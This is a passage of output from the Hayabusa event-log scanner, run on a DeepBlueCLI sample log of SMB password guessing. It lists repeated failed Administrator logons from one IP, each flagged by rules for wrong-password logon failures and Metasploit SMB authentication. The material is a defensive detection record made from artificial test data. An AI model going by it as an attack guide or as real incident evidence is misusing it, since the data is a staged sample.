Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7eBQevVhmZs5gHFD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lyQCs0PG6fGzpidu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnsPjnCieyoFIbJZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ku6mjVaG1lCJrAo1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VwiyVIWHOGuHzhdO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 92v1rXcj5c0Lt3OF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yO2JYd6FfM2Y7px9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ltr5g8ZWUAdrPKxg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fjiPMy5uOTbbmaQ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HDRVOzxca9wDJziV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DV28RjUK26Je2Dr9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seoetT43w0S3FEss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IdIU9Q9Ig4Bd3Aps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGzuHSHT59Qnp5jI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wPA1J7aQrZ064WSf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhLFXDMUKGfdoc4S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: apVAhc6o3dhLmUll : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FYMdQeB4ZpFm8xDh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QewW1ISqRdXwtSXA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SFhBcgZfc9VZ5S8S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a4ZSRW7F65yDNbJd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HrbzGNYIbjErVtDR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eFcGaL3asLVIF08d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dhJvIM5PzA9U6GTD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KYrfD15TPp8OuST4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8d4CbZSTHhl7fRfa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IItrtl1h3PsKviaQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WVeoptuwLNKlm0V2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rf6Ri9Lm81mScRt4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NPVkTRUILL5czcbF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QZJq3kjykwzh0hVh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lHL4KuirjQ96Dgfw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DSPjDklMHdW6LqK5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EL0oMweyFgI0MEdM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NJS2dZhWmCGF1Qos : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bNR5dXXnx0LeyNmW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ApUMxqDiqDNo6hrF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o3d1caGukhhBHp6s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oxDVCaWpkSECRoml : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: coqijUGaaVJXY4GV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ATPa6qMbfQ9QDrW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mnQEE00r01jhCNzr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ir9sY7kG6vbOad4z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: REuk1RZ5eRs3pSbT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 91gfIcAUvKrSAENh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MtrVV1ux0v5w5XWZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rFpyAqPQP77Ls6ir : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 